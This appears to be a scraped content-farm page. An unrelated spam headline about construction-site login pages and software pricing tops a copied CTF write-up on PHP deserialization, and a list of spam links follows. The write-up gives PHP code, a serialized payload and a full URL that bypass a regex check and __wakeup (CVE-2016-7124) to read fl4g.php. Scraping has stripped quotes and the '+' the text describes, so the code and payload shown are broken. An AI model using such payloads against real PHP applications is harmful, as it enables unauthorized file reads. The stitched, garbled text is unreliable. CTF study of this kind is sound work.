当前位置: 首页 > news >正文

建筑网站登陆页面软件定制一般多少钱

news 2025/12/20 18:58:39
建筑网站登陆页面,软件定制一般多少钱,商务类网站,合肥市城乡建设局网站首页题目解题过程PHP反序列化的一道题#xff0c;从代码看出flage在fl4g.php这个文件里面#xff0c;Demo类的构造方法可以传入文件名。把Demo的代码贴到本地做一下序列化classDemo {private $file index.php;public function __construct($file) {$this-file $file;}funct…题目解题过程PHP反序列化的一道题从代码看出flage在fl4g.php这个文件里面Demo类的构造方法可以传入文件名。把Demo的代码贴到本地做一下序列化classDemo {private $file index.php;public function __construct($file) {$this-file $file;}function__destruct() {echo highlight_file($this-file, true);}function__wakeup() {if ($this-file ! index.php) {//the secret is in the fl4g.php$this-file index.php;}}}$demo new Demo(fl4g.php);$serialized_data serialize($demo);echo $serialized_data;View Code得到序列化结果O:4:Demo:1:{s:10:Demofile;s:8:fl4g.php;}通过var参数传入这里有两个问题1.var参数要先进行base64编码调用php自带的base64_encode函数进行编码2.要绕过正则检查/[oc]:\d:/i这个正则绕过书上看见过(所以没事要多看书 _ )O后面加上就可以了O:4:Demo:1:{s:10:Demofile;s:8:fl4g.php;}最后访问连接http://220.249.52.133:36207/index.php?varTzorNDoiRGVtbyI6MTp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ嗯失败了因为__wakeup有判断文件名不是index.php就自动跳回index.php页面。。。所以还有第3步要做绕过__wakeup的检查这个正好也在书上看见过(再次印证没事要多看书 _ )CVE-2016-7124__wakeup失效当属性个数不正确时PHP不会调用__wakeup()。影响版本PHP5-PHP5.6.25PHP7-PHP7.0.10。修改属性个数1为2O:4:Demo:2:{s:10:Demofile;s:8:fl4g.php;}在进行编码后传入var参数最终的代码classDemo {private $file index.php;public function __construct($file) {$this-file $file;}function__destruct() {echo highlight_file($this-file, true);}function__wakeup() {if ($this-file ! index.php) {//the secret is in the fl4g.php$this-file index.php;}}}$demo new Demo(fl4g.php);$serialized_data serialize($demo);$strstr_replace(O:4, O:4,$serialized_data);$strstr_replace(:1:, :2:,$str);echo base64_encode($str);View Code这里有一个坑base64编码必须调用php自带的编码函数才行直接拿去在线base64编码的结果无法拿到flag原因不明。。。访问链接http://220.249.52.133:36207/index.php?varTzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ拿到flag
http://www.pierceye.com/news/659916/

相关文章:

  • 网站域名使用费多少正规抖音代运营公司排名
  • 网站建设后需要交费吗物流公司电话
  • 网站建设 福州wordpress静态文件目录下
  • 鸿顺里网站建设汕头网站排名优化报价
  • 揭阳自助建站软件社区网站建设资金申请
  • 牟平做网站衡水网页网站建设
  • 蒙文门户网站建设phpok企业建站系统
  • 域名注册网站的域名哪里来的楚雄建网站
  • 专门教ps的网站简单的app开发制作
  • 电商网站建设综述湖北seo网站设计
  • 南京做网站营销网站后台忘记账号密码
  • 敦化建设局网站饰品做国际贸易哪些网站
  • 网站做js跳转怎么创建公司
  • 网站建设合同需要交印花税吗怎么做网站卖美瞳
  • 小程序价格为什么比网站建设高自定义wordpress的实用技巧
  • 企业网站模板源码有哪些报价网站制作
  • 网站建设与网页设计实训报告二级建造师建设云网站
  • 网站后缀gov汕头网站建设小程序
  • 一个空间做多个网站wordpress大改动
  • 桂林北站到机场大巴专线时刻表wordpress 分类 标签
  • 自媒体网站源码模板dede重庆永川网站建设报价
  • 国外酷炫网站网页前端设计流程
  • 子午谷网站建设世界杯网页设计素材
  • 关于网站建设申请报告电商网站建设价位
  • 网站评价系统源码wordpress笔记本主题
  • 大庆市建设大厦网站广告设计海报
  • 惠州建设工程交易网站网络营销专业的职业生涯规划
  • 网站页面架构图阿里云的企业网站建设
  • 做微商网站有专门做网站的公司吗
  • 潍坊网站建设方案托管天津建站网